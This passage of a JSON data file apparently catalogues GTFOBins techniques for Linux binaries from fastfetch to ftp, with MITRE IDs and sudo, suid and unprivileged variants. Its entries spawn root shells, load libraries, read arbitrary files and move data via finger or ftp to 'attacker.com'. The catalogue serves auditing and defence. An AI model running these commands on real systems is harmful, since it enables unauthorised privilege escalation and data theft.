installation","aliases":[]},{"id":"gtfo:fastfetch:shell:0:suid","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /bin/sh 1>&0 2>&0\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fastfetch:shell:0:unprivileged","toolId":"gtfo:fastfetch","toolName":"fastfetch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"modules\":[{\"type\":\"command\",\"key\":\"x\",\"text\":\"exec /bin/sh 1>&0 2>&0\"}]}' >/path/to/temp-file.jsonc\nfastfetch -c /path/to/temp-file.jsonc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ffmpeg:library-load:0:sudo","toolId":"gtfo:ffmpeg","toolName":"ffmpeg","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ffmpeg -f lavfi -i anullsrc -af ladspa=file=/path/to/lib.so /path/to/temp-file.wav\nreset^J","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ffmpeg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ffmpeg:library-load:0:suid","toolId":"gtfo:ffmpeg","toolName":"ffmpeg","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ffmpeg -f lavfi -i anullsrc -af ladspa=file=/path/to/lib.so /path/to/temp-file.wav\nreset^J","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ffmpeg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ffmpeg:library-load:0:unprivileged","toolId":"gtfo:ffmpeg","toolName":"ffmpeg","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"ffmpeg -f lavfi -i anullsrc -af ladspa=file=/path/to/lib.so /path/to/temp-file.wav\nreset^J","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ffmpeg/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fgrep:file-read:0:sudo","toolId":"gtfo:fgrep","toolName":"fgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fgrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fgrep:file-read:0:suid","toolId":"gtfo:fgrep","toolName":"fgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fgrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fgrep:file-read:0:unprivileged","toolId":"gtfo:fgrep","toolName":"fgrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fgrep/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:file:file-read:0:sudo","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -f /path/to/input-file","description":"Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/file/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:file:file-read:0:suid","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -f /path/to/input-file","description":"Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/file/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:file:file-read:0:unprivileged","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"file -f /path/to/input-file","description":"Each input line is treated as a filename for the `file` command and the output is corrupted by a suffix `:` followed by the result or the error of the operation.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/file/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:file:file-read:1:sudo","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -m /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.\n\nIf a line in the target file begins with a `#`, it will not be printed as these lines are parsed as comments.\n\nIt can also be provided with a directory and will read each file in the directory.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/file/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:file:file-read:1:suid","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"file -m /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.\n\nIf a line in the target file begins with a `#`, it will not be printed as these lines are parsed as comments.\n\nIt can also be provided with a directory and will read each file in the directory.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/file/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:file:file-read:1:unprivileged","toolId":"gtfo:file","toolName":"file","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"file -m /path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside quotes.\n\nIf a line in the target file begins with a `#`, it will not be printed as these lines are parsed as comments.\n\nIt can also be provided with a directory and will read each file in the directory.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/file/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:file-read:0:sudo","toolId":"gtfo:find","toolName":"find","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"find /path/to/input-file -exec cat {} \\;","description":"This uses `cat` to actually read the file, but since permissions are not dropped, it's executed with the same privileges as `find`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:file-read:0:suid","toolId":"gtfo:find","toolName":"find","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"find /path/to/input-file -exec cat {} \\;","description":"This uses `cat` to actually read the file, but since permissions are not dropped, it's executed with the same privileges as `find`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:file-read:0:unprivileged","toolId":"gtfo:find","toolName":"find","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"find /path/to/input-file -exec cat {} \\;","description":"This uses `cat` to actually read the file, but since permissions are not dropped, it's executed with the same privileges as `find`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:file-write:0:sudo","toolId":"gtfo:find","toolName":"find","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"find / -fprintf /path/to/output-file DATA -quit","description":"`DATA` is a format string, it supports some escape sequences.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:file-write:0:suid","toolId":"gtfo:find","toolName":"find","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"find / -fprintf /path/to/output-file DATA -quit","description":"`DATA` is a format string, it supports some escape sequences.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:file-write:0:unprivileged","toolId":"gtfo:find","toolName":"find","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"find / -fprintf /path/to/output-file DATA -quit","description":"`DATA` is a format string, it supports some escape sequences.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:shell:0:sudo","toolId":"gtfo:find","toolName":"find","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"find . -exec /bin/sh \\; -quit","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:shell:0:suid","toolId":"gtfo:find","toolName":"find","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"find . -exec /bin/sh -p \\; -quit","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:find:shell:0:unprivileged","toolId":"gtfo:find","toolName":"find","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"find . -exec /bin/sh \\; -quit","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/find/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:finger:download:0:sudo","toolId":"gtfo:finger","toolName":"finger","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"finger x@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/finger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:finger:download:0:suid","toolId":"gtfo:finger","toolName":"finger","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"finger x@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/finger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:finger:download:0:unprivileged","toolId":"gtfo:finger","toolName":"finger","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"finger x@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/finger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:finger:upload:0:sudo","toolId":"gtfo:finger","toolName":"finger","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"finger DATA@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/finger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:finger:upload:0:suid","toolId":"gtfo:finger","toolName":"finger","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"finger DATA@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/finger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:finger:upload:0:unprivileged","toolId":"gtfo:finger","toolName":"finger","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"finger DATA@attacker.com","description":"The command hangs waiting for the remote peer to close the socket.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/finger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:firejail:shell:0:sudo","toolId":"gtfo:firejail","toolName":"firejail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"firejail /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/firejail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:firejail:shell:0:unprivileged","toolId":"gtfo:firejail","toolName":"firejail","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"firejail /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/firejail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fish:shell:0:sudo","toolId":"gtfo:fish","toolName":"fish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fish","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fish:shell:0:suid","toolId":"gtfo:fish","toolName":"fish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"fish","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fish:shell:0:unprivileged","toolId":"gtfo:fish","toolName":"fish","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"fish","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:flock:shell:0:sudo","toolId":"gtfo:flock","toolName":"flock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"flock -u / /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/flock/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:flock:shell:0:suid","toolId":"gtfo:flock","toolName":"flock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"flock -u / /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/flock/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:flock:shell:0:unprivileged","toolId":"gtfo:flock","toolName":"flock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"flock -u / /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/flock/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fmt:file-read:0:sudo","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -pNON_EXISTING_PREFIX /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fmt:file-read:0:suid","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -pNON_EXISTING_PREFIX /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fmt:file-read:0:unprivileged","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fmt -pNON_EXISTING_PREFIX /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fmt:file-read:1:sudo","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fmt:file-read:1:suid","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fmt -999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fmt:file-read:1:unprivileged","toolId":"gtfo:fmt","toolName":"fmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fmt -999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fmt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fold:file-read:0:sudo","toolId":"gtfo:fold","toolName":"fold","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fold -w999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fold/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fold:file-read:0:suid","toolId":"gtfo:fold","toolName":"fold","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fold -w999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fold/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fold:file-read:0:unprivileged","toolId":"gtfo:fold","toolName":"fold","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fold -w999 /path/to/input-file","description":"This corrupts the output by wrapping very long lines at the given width (`999`).","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fold/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:forge:shell:0:sudo","toolId":"gtfo:forge","toolName":"forge","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh' >/path/to/temp-file\necho -e \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" >>/path/to/temp-file\nchmod +x /path/to/temp-file\nforge build --use /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/forge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:forge:shell:0:suid","toolId":"gtfo:forge","toolName":"forge","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh' >/path/to/temp-file\necho -e \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" >>/path/to/temp-file\nchmod +x /path/to/temp-file\nforge build --use /path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/forge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:forge:shell:0:unprivileged","toolId":"gtfo:forge","toolName":"forge","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '#!/bin/sh' >/path/to/temp-file\necho -e \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" >>/path/to/temp-file\nchmod +x /path/to/temp-file\nforge build --use /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/forge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fping:file-read:0:sudo","toolId":"gtfo:fping","toolName":"fping","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fping -f /path/to/input-file","description":"Each line is treated as an hostname and it's leaked as an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/fping/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fping:file-read:0:suid","toolId":"gtfo:fping","toolName":"fping","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"fping -f /path/to/input-file","description":"Each line is treated as an hostname and it's leaked as an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/fping/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:fping:file-read:0:unprivileged","toolId":"gtfo:fping","toolName":"fping","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"fping -f /path/to/input-file","description":"Each line is treated as an hostname and it's leaked as an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/fping/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ftp:download:0:sudo","toolId":"gtfo:ftp","toolName":"ftp","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ftp -a attacker.com\nget /path/to/input-file output-file","description":"Instead of `-a`, credentials can be supplied via the `user:password@host` connection 